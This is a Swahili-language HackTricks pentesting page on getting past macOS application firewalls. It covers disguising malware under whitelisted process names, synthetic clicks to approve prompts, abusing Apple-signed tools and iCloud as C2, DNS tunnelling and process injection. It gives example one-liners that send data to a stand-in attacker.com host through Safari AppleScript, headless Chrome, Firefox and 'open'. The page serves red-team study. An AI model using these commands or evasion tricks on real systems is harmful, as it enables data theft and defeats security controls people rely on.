hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

Kupita Kizuizi za Firewalls za macOS

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi ya PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud repos za github.

Mbinu Zilizopatikana

Mbinu zifuatazo zilipatikana kufanya kazi kwenye baadhi ya programu za kizuizi cha firewall za macOS.

Kutumia majina ya orodha nyeupe

• Kwa mfano, kuita programu hasidi kwa majina ya michakato maarufu ya macOS kama vile launchd

Bonyeza ya Kisynthetic

• Ikiwa kizuizi cha firewall kinahitaji idhini kutoka kwa mtumiaji, fanya programu hasidi ibonyeze ruhusa

Tumia programu tumizi zilizosainiwa na Apple

• Kama vile curl, lakini pia nyingine kama vile whois

Kikoa maarufu cha Apple

Kizuizi cha firewall kinaweza kuruhusu uhusiano kwenye vikoa maarufu vya Apple kama vile apple.com au icloud.com. Na iCloud inaweza kutumika kama C2.

Kupita Kizuizi kwa Ujumla

Baadhi ya mawazo ya kujaribu kupita kizuizi cha firewall

Angalia trafiki iliyoruhusiwa

Kujua trafiki iliyoruhusiwa kutakusaidia kutambua vikoa vilivyowekwa kwenye orodha nyeupe au ni programu gani zinazoruhusiwa kufikia vikoa hivyo

lsof -i TCP -sTCP:ESTABLISHED

Kutumia DNS

Utaratibu wa DNS hutumiwa kupitia programu iliyosainiwa ya mdnsreponder ambayo inaweza kuruhusiwa kuwasiliana na seva za DNS.

Kupitia programu za Kivinjari

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

{% code overflow="wrap" %}

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Kupitia kuingiza michakato

Ikiwa unaweza kuingiza namna ya kanuni ndani ya mchakato ambao una ruhusa ya kuunganisha kwenye seva yoyote, unaweza kuzunguka ulinzi wa firewall:

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

Marejeo

• https://www.youtube.com/watch?v=UlT5KFTMn2k

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi ya PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye HackTricks na HackTricks Cloud github repos.